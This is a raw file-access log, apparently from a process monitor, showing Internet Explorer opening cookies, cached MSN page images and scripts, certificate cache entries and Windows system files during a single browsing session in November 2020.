11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\W15N7ZSW.TXT
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\8IX7DPVU.TXT
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\UIAnimation.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\UIAnimation.dllUIAnimation.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\VMNAML7Z.TXT
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\AA3jsXa[1].png
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\AA3jsXa[1].pngAA3jsXa[1].png
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\BBqgb7K[1].png
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\BBqgb7K[1].pngBBqgb7K[1].png
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\AAwGgve[1].jpg
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\AAwGgve[1].jpgAAwGgve[1].jpg
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\AAgPBML[1].png
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\AAgPBML[1].pngAAgPBML[1].png
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ro-RO~7.1.7601.16492.cat
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ro-RO~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ro-RO~7.1.7601.16492.cat
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\MSNIdSync[1].js
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\MSNIdSync[1].jsMSNIdSync[1].js
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~th-TH~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~th-TH~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~th-TH~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\br_msn_home_vitrine[1].js
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\br_msn_home_vitrine[1].jsbr_msn_home_vitrine[1].js
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD67423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD67423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0E
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0EA9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0E
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0E
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0EA9E4F776657345B52012CE8E279D314C_9E5F079A21E9B5A16B5D6449033D0D0E
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABEDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABEDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\br_msn_home_vitrine.cfg[1].js
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\br_msn_home_vitrine.cfg[1].jsbr_msn_home_vitrine.cfg[1].js
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\aep-formats-20.14.0.min[1].js
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\aep-formats-20.14.0.min[1].jsaep-formats-20.14.0.min[1].js
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\59c177f5d970c300041220e2.tpl.min[1].js
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\59c177f5d970c300041220e2.tpl.min[1].js59c177f5d970c300041220e2.tpl.min[1].js
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\TaboolaCookieSyncScript[1].js
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\TaboolaCookieSyncScript[1].jsTaboolaCookieSyncScript[1].js
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE46BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE46BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\59c177f5d970c300041220e2[1].css
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\59c177f5d970c300041220e2[1].css59c177f5d970c300041220e2[1].css
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\58b810[1].gif
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\58b810[1].gif58b810[1].gif
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42F12703B35B1F82C21160A92376087C84_D65FD79591497596ED270B90105A4D42
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\msn[1].htm
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\msn[1].htmmsn[1].htm
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~nl-NL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~nl-NL~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~nl-NL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\publishertag[1].js
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\publishertag[1].jspublishertag[1].js
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\SILENTPASSPORT[1].HTM
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sl-SI~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sl-SI~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sl-SI~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\FZP5WLKE.TXT
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~et-EE~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~et-EE~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~et-EE~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\c08e43[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\c08e43[1].jpgc08e43[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecsExt.dll
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecsExt.dllWindowsCodecsExt.dll
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msxml6.dll
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msxml6.dll
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.mui
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.muiKernelBase.dll.mui
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msxml6r.dll
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msxml6r.dll
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\865070[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\865070[1].jpg865070[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\8bd8bf[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\8bd8bf[1].jpg8bd8bf[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\8adb60[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\8adb60[1].jpg8adb60[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\undefined[1].png
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\undefined[1].pngundefined[1].png
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\784660[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\784660[1].jpg784660[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\784659[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\784659[1].jpg784659[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\784663[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\784663[1].jpg784663[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\784658[1].jpg
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\784658[1].jpg784658[1].jpg
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\async_usersync[1].htm
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\async_usersync[1].htmasync_usersync[1].htm
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\beacon[1].js
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\beacon[1].jsbeacon[1].js
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hi-IN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hi-IN~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hi-IN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~he-IL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~he-IL~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~he-IL~7.1.7601.16492.cat
